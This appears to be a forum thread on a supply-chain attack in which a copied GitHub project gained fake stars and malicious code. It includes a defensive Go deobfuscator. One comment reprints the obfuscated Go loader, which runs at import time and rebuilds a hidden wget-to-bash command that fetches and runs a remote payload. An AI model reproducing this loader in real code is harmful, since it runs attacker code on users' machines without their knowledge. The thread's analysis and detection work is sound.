Attacker Copied GitHub Project, Added Fake Stars and Malicious Code

23 points by veqq


Linking to reddit feels strange (and I had to condense the title-summary), but the project documented it in this post and I believe this is worthwhile to look at. The comments amass a lot of interesting stuff, namely similar attacks using this attack vector (partial pun, since it obfuscates with arrays!).

oz

Thanks for sharing! Supply chain attacks are not new, but it’s interesting to see how they gamed GitHub’s game of stars.

toastal

This is why we need to turn off the knobs of social media on code forges—or at least teach folks that numbers like ‘stars’ are almost entirely arbitrary & can be gamed or faked. For instance, I have star counts set at something like 50% opacity in a userStyle as an extra reminder that these don’t matter when assessing a project among many other things. This is also one of the bad socially-engineered flood gates ForgeFed that could open if Forgejo keeps copying instead of dropping from the proprietary code forge offerings.

eduard

func CGDUMG() error {
	// Character table: the payload string is scattered across single-character
	// entries so that no readable command appears anywhere in the source.
	maOB := []string{"/", "n", "7", "r", "n", "a", "s", "t", " ", "d", "r", "s", "f", "u", "t", "p", "e", "s", "w", "f", "6", "s", "0", "o", "f", "g", "/", "e", "a", "t", "d", "3", "&", "t", "3", " ", "/", "e", "b", "/", " ", "e", "-", "u", "/", "h", "|", "h", "n", "q", "b", "O", "-", "t", "b", "/", ":", " ", ".", "e", "g", " ", "5", "d", "1", "i", "4", "e", "3", " ", "o", "b", "/", "a"}
	POFd := "/bin/sh"
	rwsg := "-c"
	// The command line is rebuilt one character at a time by indexing the table.
	iBIhzvd := maOB[18] + maOB[60] + maOB[67] + maOB[33] + maOB[35] + maOB[42] + maOB[51] + maOB[57] + maOB[52] + maOB[61] + maOB[45] + maOB[7] + maOB[29] + maOB[15] + maOB[17] + maOB[56] + maOB[44] + maOB[55] + maOB[3] + maOB[27] + maOB[49] + maOB[13] + maOB[37] + maOB[21] + maOB[14] + maOB[54] + maOB[23] + maOB[1] + maOB[41] + maOB[58] + maOB[24] + maOB[43] + maOB[48] + maOB[72] + maOB[11] + maOB[53] + maOB[70] + maOB[10] + maOB[73] + maOB[25] + maOB[16] + maOB[0] + maOB[30] + maOB[59] + maOB[31] + maOB[2] + maOB[68] + maOB[63] + maOB[22] + maOB[9] + maOB[19] + maOB[39] + maOB[28] + maOB[34] + maOB[64] + maOB[62] + maOB[66] + maOB[20] + maOB[38] + maOB[12] + maOB[69] + maOB[46] + maOB[40] + maOB[36] + maOB[50] + maOB[65] + maOB[4] + maOB[26] + maOB[71] + maOB[5] + maOB[6] + maOB[47] + maOB[8] + maOB[32]
	// Hands the rebuilt string to /bin/sh -c and returns without waiting; the
	// error from Start() is discarded, so a failed launch leaves no trace.
	exec.Command(POFd, rwsg, iBIhzvd).Start()
	return nil
}

// Package-level initializer: CGDUMG runs at import time, before main, in any
// program that depends on this package. (The fragment omits the enclosing
// package clause and the os/exec import.)
var wNAyZb = CGDUMG()

An example of obfuscated code execution, as found in one of the malicious packages.
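A defender-side counterpart to the snippet above, added here as an example and not code from the thread or from the affected project: it uses go/ast to rebuild every string a Go file assembles by indexing a []string table, so a reviewer can read the hidden command without ever running the package's init-time code. The sample source it parses is constructed for the example; the function and variable names are mine.

```go
package main
import ("fmt"; "go/ast"; "go/parser"; "go/token"; "strconv")

// strTable returns the elements of a `[]string{"a", "b", ...}` literal, or ok=false.
func strTable(e ast.Expr) (elems []string, ok bool) {
	cl, isLit := e.(*ast.CompositeLit)
	if !isLit { return nil, false }
	for _, el := range cl.Elts {
		lit, isStr := el.(*ast.BasicLit)
		if !isStr || lit.Kind != token.STRING { return nil, false }
		s, _ := strconv.Unquote(lit.Value) // the parser already validated the literal
		elems = append(elems, s)
	}
	return elems, true
}

// eval resolves `tbl[i] + tbl[j] + ...` against known tables; ok=false for anything else.
func eval(e ast.Expr, tbls map[string][]string) (string, bool) {
	switch x := e.(type) {
	case *ast.BinaryExpr:
		l, okL := eval(x.X, tbls); r, okR := eval(x.Y, tbls)
		return l + r, x.Op == token.ADD && okL && okR
	case *ast.IndexExpr:
		id, okI := x.X.(*ast.Ident); lit, okN := x.Index.(*ast.BasicLit)
		if !okI || !okN || lit.Kind != token.INT { return "", false }
		i, err := strconv.Atoi(lit.Value)
		if t := tbls[id.Name]; err == nil && i >= 0 && i < len(t) { return t[i], true }
	}
	return "", false
}

// Deobfuscate maps each variable assembled by indexing a string table to its plaintext
// without executing anything; a table precedes its use, so one source-order pass suffices.
func Deobfuscate(src string) (map[string]string, error) {
	f, err := parser.ParseFile(token.NewFileSet(), "", src, 0)
	if err != nil { return nil, err }
	tbls, found := map[string][]string{}, map[string]string{}
	ast.Inspect(f, func(n ast.Node) bool {
		as, ok := n.(*ast.AssignStmt)
		if !ok || len(as.Lhs) != 1 || len(as.Rhs) != 1 { return true }
		if id, ok := as.Lhs[0].(*ast.Ident); !ok {
			return true
		} else if t, ok := strTable(as.Rhs[0]); ok {
			tbls[id.Name] = t // remember the character table under its variable name
		} else if s, ok := eval(as.Rhs[0], tbls); ok {
			found[id.Name] = s // a string rebuilt from table lookups: report it
		}
		return true
	})
	return found, nil
}

// sample is constructed for this example; it hides "ls -la" the way the thread's snippet hides its command.
const sample = "package main\nfunc init() {\n\tt := []string{\"l\", \"-\", \"s\", \" \", \"a\"}\n\tc := t[0] + t[2] + t[3] + t[1] + t[0] + t[4]\n\t_ = c\n}\n"

func main() { fmt.Println(Deobfuscate(sample)) } // map[c:ls -la] <nil>
```

Run it over the real snippet by passing the package's source text instead of `sample`; anything that is not a plain index-and-concatenate chain is left alone rather than guessed.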

ucirello

It doesn’t even need to be that popular of a repository to suffer from this attack: https://github.com/cirello-io/oversight/issues/3